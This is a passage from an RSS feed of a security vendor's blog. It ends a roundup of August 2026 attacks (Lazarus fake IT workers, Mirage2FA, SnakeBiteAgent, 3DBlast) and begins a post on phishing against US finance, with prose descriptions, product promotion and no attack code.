<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-smile-1024x1024.png" alt="Lazarus APT’s IT workers caught on camera" class="wp-image-22573" style="width:622px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-smile-1024x1024.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-smile-300x300.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-smile-150x150.png 150w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-smile-768x768.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-smile-70x70.png 70w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-smile-370x370.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-smile-270x270.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-smile-740x740.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Lazarus-smile.png 1254w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Lazarus APT’s IT workers caught on camera</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The investigation exposed the use of <strong>forged and stolen identities, mule bank accounts, VPNs, remote desktop software, and AI-assisted document manipulation</strong>. More importantly, it showed why these schemes go beyond recruitment fraud: once a false identity passes hiring checks, the worker can receive legitimate access to source code, internal systems, intellectual property, and trusted business processes without exploiting a vulnerability. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text"> Give your SOC faster access to investigation context.
<br>
<span class="highlight">Cut MTTR by up to 21 minutes per case.</span>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Accelerate Threat Investigations</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<p class="wp-block-paragraph"><strong>Insider risk to reduce:</strong> Organizations hiring remotely should treat identity verification as an ongoing security control rather than a one-time HR check. Periodic verification, monitoring for unexpected VPN and remote-access activity, and closer review of privileged developer access can help reveal suspicious behavior after onboarding. </p>



<h2 class="wp-block-heading">3. Mirage2FA Hijacked Microsoft 365 Sessions, Hitting Over 4K Victims in the US </h2>



<p class="wp-block-paragraph">Mirage2FA put US organizations at the center of a large Microsoft 365 phishing operation, with <strong>over 4,000 victims in the United States</strong>. The phishing-as-a-service toolkit used adversary-in-the-middle techniques to intercept credentials, 2FA codes, and authenticated session cookies, allowing attackers to hijack active Microsoft 365 sessions even after users completed MFA. </p>



<p class="wp-block-paragraph"><a href="https://any.run/cybersecurity-blog/mirage2fa-phishing-targets-us-companies/" target="_blank" rel="noreferrer noopener">Check detailed breakdown</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="707" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Mirage2FA-in-brief-1024x707.png" alt="Mirage2FA in brief" class="wp-image-22639" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Mirage2FA-in-brief-1024x707.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Mirage2FA-in-brief-300x207.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Mirage2FA-in-brief-768x530.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Mirage2FA-in-brief-1536x1060.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Mirage2FA-in-brief-2048x1413.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Mirage2FA-in-brief-370x255.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Mirage2FA-in-brief-270x186.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Mirage2FA-in-brief-435x300.png 435w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/Mirage2FA-in-brief-740x511.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Mirage2FA phishing targets US companies in technology and manufacturing</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">Technology, manufacturing, education, consulting, and telecommunications were among the industries exposed. Session theft was the most common compromise outcome, creating a path to corporate email, cloud services, internal documents, and trusted business accounts that attackers could use for impersonation, fraud, or further access. </p>



<p class="wp-block-paragraph"><strong>Session theft risk to address:</strong> A password reset may not be enough once an authenticated session has been stolen. Security teams should revoke active sessions and tokens, investigate activity performed through the compromised identity, and strengthen high-risk accounts with phishing-resistant MFA. ANY.RUN helps reveal the complete browser-based attack flow and identify session theft before a compromised Microsoft 365 account creates wider business exposure. </p>



<h2 class="wp-block-heading">4. SnakeBiteAgent Turned a Business-Themed ZIP into Full Remote Access </h2>



<p class="wp-block-paragraph">ANY.RUN uncovered a new .NET RAT, SnakeBiteAgent, delivered inside a business-themed ZIP archive. Once executed, the malware could give attackers <strong>full remote control, access to credentials, and persistent surveillance capabilities</strong>, turning a seemingly routine business file into a serious endpoint compromise. </p>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/fc19e097-0cec-4256-9e9e-ab0c52ec0136/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View analysis session</a> </p>



<p class="wp-block-paragraph"><a href="https://x.com/anyrun_app/status/2092613370583126466" target="_blank" rel="noreferrer noopener">Check details and gather IOCs</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="819" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Snakebiteagent-1-819x1024.png" alt="SnakeBiteAgent C2 protocol and observed capabilities " class="wp-image-22932" style="width:633px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Snakebiteagent-1-819x1024.png 819w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Snakebiteagent-1-240x300.png 240w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Snakebiteagent-1-768x960.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Snakebiteagent-1-1229x1536.png 1229w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Snakebiteagent-1-1638x2048.png 1638w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Snakebiteagent-1-370x463.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Snakebiteagent-1-270x338.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Snakebiteagent-1-740x925.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Snakebiteagent-1-scaled.png 2048w" sizes="auto, (max-width: 819px) 100vw, 819px" /><figcaption class="wp-element-caption"><em>SnakeBiteAgent C2 protocol and observed capabilities</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">SnakeBiteAgent contains 274 methods with no obfuscation, while its command-and-control traffic is transmitted without encryption. Its capabilities include credential theft, keylogging, hidden desktop access, webcam and microphone capture, and silent installation of AnyDesk and MeshCentral for additional remote access. </p>



<p class="wp-block-paragraph"><strong>Endpoint exposure to contain:</strong> A suspicious archive should be investigated beyond the initial file verdict. Security teams need to determine what executes after extraction, what information the malware can access, and whether remote control has already been established. ANY.RUN exposes the execution chain and C2 communication across the analysis sessions, helping analysts confirm the scope of compromise and contain persistent access before exposure spreads. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text"> <span class="highlight">Cut the risk of persistent attacker access.</span>
<br>
Help your SOC move from evidence to containment faster.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contain Threats Earlier</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">5. 3DBlast Used Microsoft and Google Login Flows to Target US Organizations </h2>



<p class="wp-block-paragraph">A newly observed phishing kit, 3DBlast, targeted users in the <strong>United States</strong> while impersonating Microsoft 365, Office 365, and Google. Instead of relying on one fixed phishing flow, the kit could switch between BitB, OAuth/device code phishing, AiTM, and DOM relay techniques while rotating its infrastructure. </p>



<p class="wp-block-paragraph"><a href="https://app.any.run/tasks/f433e34a-985e-45db-b6d9-2d1159467ecf?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktoservice" target="_blank" rel="noreferrer noopener">View analysis session</a> </p>



<p class="wp-block-paragraph"><a href="https://x.com/anyrun_app/status/2090084956408033762" target="_blank" rel="noreferrer noopener">Check details and gather IOCs</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="819" height="1024" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Microsoft-365-BitB-819x1024.jpeg" alt="3DBlast using Microsoft 365 BitB and AiTM phishing landing " class="wp-image-22933" style="width:593px;height:auto" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Microsoft-365-BitB-819x1024.jpeg 819w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Microsoft-365-BitB-240x300.jpeg 240w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Microsoft-365-BitB-768x960.jpeg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Microsoft-365-BitB-1229x1536.jpeg 1229w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Microsoft-365-BitB-1638x2048.jpeg 1638w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Microsoft-365-BitB-370x463.jpeg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Microsoft-365-BitB-270x338.jpeg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Microsoft-365-BitB-740x925.jpeg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/Microsoft-365-BitB-scaled.jpeg 2048w" sizes="auto, (max-width: 819px) 100vw, 819px" /><figcaption class="wp-element-caption"><em>3DBlast using Microsoft 365 BitB and AiTM phishing landing</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">These different flows allowed attackers to reproduce familiar login experiences, abuse legitimate authentication processes, intercept sessions, and relay victim interactions in real time. For organizations, that increases the risk of account takeover while making <a href="https://any.run/use-case/phishing/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktophishing" target="_blank" rel="noreferrer noopener">phishing</a> harder to recognize from a single URL, page, or authentication event. </p>



<p class="wp-block-paragraph">Analysts can use ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> to pivot from recurring campaign patterns and uncover related activity: </p>



<p class="wp-block-paragraph"><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktotilookup#{%22query%22:%22url:%5C%22/sw.js%5C%5C?tab=t*_*%5C%22%20and%20threatName:%5C%22phishing%5C%22%22,%22dateRange%22:180}" target="_blank" rel="noreferrer noopener">url:&#8221;/sw.js\?tab=t*_*&#8221; and threatName:&#8221;phishing&#8221;</a> </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="585" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1024x585.png" alt="TI Lookup showcases more context and related activity" class="wp-image-22934" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1024x585.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-300x171.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-768x439.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-1536x877.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-2048x1170.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-370x211.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-270x154.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-lookup-740x423.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup showcases more context and related activity</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">Close Detection Gaps Exposed by August’s Attacks </h2>



<p class="wp-block-paragraph">August’s attacks showed how quickly malicious activity can change shape. Attackers rotated infrastructure, switched phishing flows, abused legitimate software and authentication processes, and used techniques that could look normal until the wider attack chain became visible. </p>



<p class="wp-block-paragraph">For SOC teams, reducing risk means keeping defenses current, getting enough behavioral evidence to make faster decisions, and connecting individual alerts to the campaigns behind them. </p>



<h3 class="wp-block-heading">1. Keep Detection Updated with Fresh Threat Intelligence </h3>



<p class="wp-block-paragraph">Domains, URLs, IP addresses, and delivery infrastructure can change long before a campaign disappears. Relying on indicators collected from previous incidents can leave gaps as attackers move to new infrastructure or modify their delivery methods. </p>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a> provide newly observed malicious IPs, domains, and URLs that teams can integrate into SIEM, SOAR, TIP, firewalls, and other security tools. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="422" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-1024x422.png" alt="Fresh threat intelligence delivered directly to existing security controls " class="wp-image-22925" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-1024x422.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-300x124.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-768x317.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-1536x634.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-370x153.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-270x111.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1-740x305.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/06/image-1.png 1583w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Fresh threat intelligence delivered directly to existing security controls</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">The intelligence comes from real-world sandbox investigations, helping security teams continuously update detection coverage instead of waiting for manually collected indicators. Each IOC can also be traced back to the sandbox session where it appeared, giving analysts additional context before they block or escalate it. </p>



<h3 class="wp-block-heading">2. Give Analysts Behavioral Evidence Behind the Alert </h3>



<p class="wp-block-paragraph">A suspicious URL, attachment, or application does not always reveal the real level of risk on its own. The important evidence often appears after execution: redirects, scripts, credential collection, remote access, persistence, additional payloads, or network communication. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="561" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/sandbox-revealing-behavior-1024x561.png" alt="Full attack behavior revealed inside ANY.RUN’s Interactive Sandbox " class="wp-image-22952" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/sandbox-revealing-behavior-1024x561.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/sandbox-revealing-behavior-300x164.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/sandbox-revealing-behavior-768x420.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/sandbox-revealing-behavior-1536x841.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/sandbox-revealing-behavior-2048x1121.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/sandbox-revealing-behavior-370x203.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/sandbox-revealing-behavior-270x148.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/sandbox-revealing-behavior-740x405.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Full attack behavior revealed inside ANY.RUN’s Interactive Sandbox </em></figcaption></figure>
</div>


<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> lets analysts safely observe what suspicious files and URLs actually do. Teams can follow browser activity, process execution, network traffic, authentication flows, persistence, credential access, and other behavior within the same investigation. </p>



<p class="wp-block-paragraph">This gives analysts more evidence to confirm malicious activity, determine the potential scope of compromise, and make containment decisions without rebuilding the attack chain across several separate tools. </p>



<h3 class="wp-block-heading">3. Expand Individual Alerts into Wider Threat Context </h3>



<p class="wp-block-paragraph">One confirmed malicious file, URL, or domain may represent only a small part of an active campaign. Investigating each indicator separately can make it harder to recognize related infrastructure, recurring behavior, or attacks already observed elsewhere. </p>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> helps teams pivot from files, URLs, domains, IP addresses, behaviors, and sandbox sessions to related threat activity across current and historical data. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="586" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/finance_phish_lookup-1024x586.png" alt="ANY.RUN Threat Intelligence Lookup " class="wp-image-22917" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/finance_phish_lookup-1024x586.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/finance_phish_lookup-300x172.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/finance_phish_lookup-768x440.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/finance_phish_lookup-1536x879.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/finance_phish_lookup-370x212.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/finance_phish_lookup-270x155.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/finance_phish_lookup-740x424.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/08/finance_phish_lookup.png 1829w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Related threat activity connected through ANY.RUN Threat Intelligence Lookup</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">Analysts can use individual IOCs or recurring campaign patterns as starting points for threat hunting, uncover connected infrastructure, and check whether similar activity has already appeared in other investigations. </p>



<p class="wp-block-paragraph">Together, TI Lookup and sandbox evidence help teams move beyond one alert at a time and understand the broader threat context sooner, while TI Feeds bring newly observed indicators back into existing security controls to strengthen detection against the next attempt. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text"> <span class="highlight">Turn stronger threat visibility into faster business protection.</span>
<br>
Enable faster detection, investigation, and containment.
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Strengthen Your SOC</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">About ANY.RUN </h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> provides interactive malware analysis and threat intelligence solutions used by more than 16,000 organizations and 700,000 security professionals worldwide. </p>



<p class="wp-block-paragraph">Its <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> helps SOC teams, MSSPs, and enterprise security teams safely analyze suspicious files, URLs, phishing pages, and malware while observing the full attack chain in real time. Analysts can inspect browser activity, processes, network traffic, persistence, credential access, and other behavior to make faster and more confident response decisions. </p>



<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence</a> turns data from real-world sandbox investigations into actionable context for detection, threat hunting, and incident response. Teams can uncover related infrastructure, connect individual alerts to wider campaigns, and bring newly observed threat data into existing security controls. </p>



<p class="wp-block-paragraph">ANY.RUN is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=major-cyber-attacks-august-2026&amp;utm_term=010926&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II attested</a>, reflecting its commitment to strong security controls and customer data protection. By combining behavioral analysis with current threat intelligence, ANY.RUN helps security teams reduce investigation uncertainty, improve detection coverage, and contain threats before they create wider business impact. </p>
<p>The post <a href="https://any.run/cybersecurity-blog/major-cyber-attacks-august-2026/">Major Cyber Attacks in August 2026: US and EU Businesses Hit by Session Hijacking, Remote Access, and Insider Risk</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/major-cyber-attacks-august-2026/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>US Finance Under Phishing Pressure: What the SOC Data Reveals?</title>
		<link>https://any.run/cybersecurity-blog/phishing-us-finance/</link>
					<comments>https://any.run/cybersecurity-blog/phishing-us-finance/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 26 Aug 2026 09:17:40 +0000</pubDate>
				<category><![CDATA[Cybersecurity Lifehacks]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware analysis]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=22886</guid>

					<description><![CDATA[<p>With modern campaigns such as Vercel-hosted RMM attacks, the scale and security impact of phishing in US finance should not be understated. As threats get increasingly harder to detect, the phishing challenge raises the stakes in the industry. Legitimate services and tools used in daily workflows across corporate America are increasingly abused to deliver phishing [&#8230;]</p>
<p>The post <a href="https://any.run/cybersecurity-blog/phishing-us-finance/">US Finance Under Phishing Pressure: What the SOC Data Reveals?</a> appeared first on <a href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p class="wp-block-paragraph">With modern campaigns such as <a href="https://any.run/cybersecurity-blog/us-campaign-malware-analysis/" target="_blank" rel="noreferrer noopener">Vercel-hosted RMM attacks</a>, the scale and security impact of <a href="https://any.run/use-case/phishing/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktophishing" target="_blank" rel="noreferrer noopener">phishing</a> in US finance should not be understated. As threats get increasingly harder to detect, the phishing challenge raises the stakes in the industry. </p>



<p class="wp-block-paragraph">Legitimate services and tools used in daily workflows across corporate America are increasingly <a href="https://any.run/cybersecurity-blog/kali365-phishing-targeting-us/" target="_blank" rel="noreferrer noopener">abused</a> to deliver phishing attacks or disguise malicious activity. <a href="https://any.run/cybersecurity-blog/mirage2fa-phishing-targets-us-companies/" target="_blank" rel="noreferrer noopener">Identity-based attacks</a> let threat actors spread across an organization from a single, barely detectable entry point. </p>



<p class="wp-block-paragraph">At the same time, malware itself is only part of the problem. Operational gaps inside SOCs also contribute to the issue. </p>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a> investigation data shows how several cybersecurity pressures come together for financial-sector security teams, leading to <a href="https://any.run/cybersecurity-blog/usa-top-30-threats-2026/" target="_blank" rel="noreferrer noopener">higher phishing exposure</a> and heavier workloads for individual analysts. </p>



<p class="wp-block-paragraph">From these challenges also come the solutions security leaders should consider for malware &amp; phishing resilience. </p>



<h2 class="wp-block-heading">Key Takeaways </h2>



<ul class="wp-block-list">
<li>Phishing remains a major risk for US finance, with campaigns becoming more scalable and harder to detect. </li>
</ul>



<ul class="wp-block-list">
<li>Modern phishing techniques challenge traditional defenses, increasing the need for deeper behavioral and threat visibility. </li>
</ul>



<ul class="wp-block-list">
<li>ANY.RUN combines real-time analysis with fresh threat intelligence to help SOCs detect malicious activity earlier and investigate with greater context. </li>
</ul>



<ul class="wp-block-list">
<li>Threat data from 16K+ organizations helps financial security teams expand visibility into emerging threats and reduce risk exposure. </li>
</ul>



<h2 class="wp-block-heading">Why Phishing Puts Financial SOCs Under Particular Pressure </h2>



<p class="wp-block-paragraph">The <a href="https://any.run/by-industry/finance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktofinance" target="_blank" rel="noreferrer noopener">finance sector</a> is saturated with high-value identities, transactions, and sensitive financial data. At the same time, email-heavy workflows create a large attack surface for phishing. </p>



<p class="wp-block-paragraph">This is reflected in what financial organizations investigate. According to <a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=phishing-us-finance&amp;utm_term=260826&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>, <strong>58% of submissions from finance companies are emails</strong>, and <strong>14.8% of those emails are</strong> <strong>malicious</strong>. </p>



<p class="wp-block-paragraph">Phishing exposure in finance is also higher than the overall benchmark. As per ANY.RUN research, <strong>72.7% of finance companies&#8217; investigations involve phishing</strong>. </p>



<p class="wp-block-paragraph">For SOC teams, this increased exposure translates into investigation volume, contributing to heightened analyst pressure. Based on ANY.RUN&#8217;s 2026 investigation data across financial organizations, <strong>workload per analyst in finance is 24% higher than the global median</strong>. </p>



